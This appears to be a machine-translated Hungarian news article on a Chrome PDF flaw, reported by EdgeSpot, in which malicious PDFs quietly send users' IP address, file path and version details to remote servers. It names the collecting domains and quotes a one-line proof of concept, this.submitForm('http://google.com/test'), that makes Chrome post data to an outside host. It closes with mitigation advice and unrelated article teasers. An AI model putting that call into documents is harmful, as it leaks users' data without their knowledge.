A Chrome sebezhetősége lehetővé teszi a hackerek számára, hogy felhasználói adatokat pdf fájlokon keresztül gyűjtsenek
Tartalomjegyzék:
Videó: iProfitIQ Public Beta Released - Great OA & RA Tool for Chrome 2024
Az észlelési szolgáltatás kiaknázása Az EdgeSpot egy érdekes, nulla napos biztonsági rést fedez fel a PDF-dokumentumokat kihasználva. A biztonsági rés lehetővé teszi a támadók számára, hogy érzékeny adatokat gyűjtsenek a Chrome-ban megnyitott rosszindulatú PDF-dokumentumokkal.
Amint az áldozat megnyitja a megfelelő PDF fájlokat a Google Chrome-ban, egy rosszindulatú program a háttérben dolgozik, felhasználói adatok gyűjtésével.
Az adatokat ezután továbbítják a távoli szerverhez, amelyet a hackerek irányítanak. Kíváncsi lehet, hogy milyen adatokat szednek a támadók, és a következő adatokat célozzák meg a számítógépen:
- IP-cím
- A PDF fájl teljes elérési útja a rendszeren
- OS és Chrome verziók
Óvakodj a rosszindulatú szoftverekkel sújtott PDF fájlokról
Meglepődhet, ha tudomásul veszi, hogy semmi sem történik, ha az Adobe Reader programot használja a PDF fájlok megnyitásához. Ezenkívül a HTTP POST kéréseket használják az adatok továbbítására a távoli szerverekre felhasználói beavatkozás nélkül.
A szakértők észrevették, hogy a readnotifycom vagy a burpcollaboratornet két domain egyike kapja az adatokat.
A támadás intenzitását elképzelheti úgy, hogy figyelembe veszi azt a tényt, hogy a legtöbb víruskereső szoftver nem képes felismerni az EdgeSpot által észlelt mintákat.
A szakértők felfedik, hogy a támadók az „this.submitForm ()” PDF Javascript API-t használják a felhasználók érzékeny információk gyűjtésére.
Kipróbáltuk egy minimális PoC-vel, egy olyan egyszerű API-hívással, mint a “this.submitForm ('http://google.com/test')” a Google Chrome elküldi a személyes adatokat a google.com webhelyre.
A szakértők valóban kiderítették, hogy ezt a Chrome-hibát két különálló, rosszindulatú PDF-fájlok halmozták ki. Mindkettőt 2017 októberében és 2018 szeptemberében terjesztették forgalomba.
Nevezetesen, az összegyűjtött adatokat a támadók felhasználhatják a jövőbeli támadások finomhangolására. A jelentések azt sugallják, hogy az első fájlkészlet a ReadNotify PDF-követő szolgáltatásával készült össze.
A felhasználók felhasználhatják a szolgáltatást a felhasználói nézetek nyomon követésére. Az EdgeSpot még nem osztott meg részleteket a PDF-fájlok második csoportjának jellegéről.
Hogyan lehet védeni
Az EdgeSpot exploit észlelési szolgáltatása figyelmeztette a felhasználókat, a Chrome felhasználóit a lehetséges kockázatokra, mivel a javítás várhatóan nem várható a közeljövőben.
Az EdgeSpot tavaly számolt be a Google-nak a sebezhetőségről, és a vállalat április végén megígérte, hogy kiad egy javítást. H
De megfontolhatja egy ideiglenes megoldás alkalmazását a probléma megoldásához, ha helyben megtekinti a kapott PDF-dokumentumokat egy alternatív PDF-olvasó alkalmazás segítségével.
Alternatív megoldásként a PDF-dokumentumokat a Chrome-ban is megnyithatja, ha leválasztja a rendszereit az internetről. Időközben megvárhatja a Chrome 74 frissítést, amely várhatóan április 23-án válik elérhetővé.
Az Office 365 lehetővé teszi, hogy jobban ellenőrizze, hogy mely adatokat osztja meg a Microsoft segítségével
A Microsoft két új kategóriát (kötelező és opcionális) vezetett be az adatgyűjtési lehetőségekhez az Office 365 Enterprise felhasználók számára.
Az Outlook sebezhetősége lehetővé teszi a hackerek számára a jelszó-kivonatok ellopását
A Microsoft Outlook a világ egyik legnépszerűbb e-mail platformja. Személy szerint az Outlook e-mail címemre bízom a munka- és a személyes feladatok elvégzésekor. Sajnos az Outlook nem biztos, hogy olyan biztonságos, mint ahogy azt a felhasználók gondolnák. A Carnegie Mellon Szoftverfejlesztési Intézet által közzétett jelentés szerint az Outlook…
A Yahoo javítja a sebezhetőséget, amely lehetővé teszi a hackerek számára, hogy lehallgassák az e-maileket
A Yahoo javított egy hibát a levelezőszolgáltatásában, amely lehetővé tette a hackerek számára, hogy lehallgassák a felhasználói e-maileket majdnem egy évvel azután, hogy ugyanazt a hibát nyilvánosságra hozták és javították. A finnországi Jouko Pynnonen 10 000 dollárt kapott a Yahoo-tól az új biztonsági rés feltárása érdekében, amelyet a Yahoo a múlt hónapban rögzített. A hiba a webhelyek közötti szkriptek támadására vonatkozott…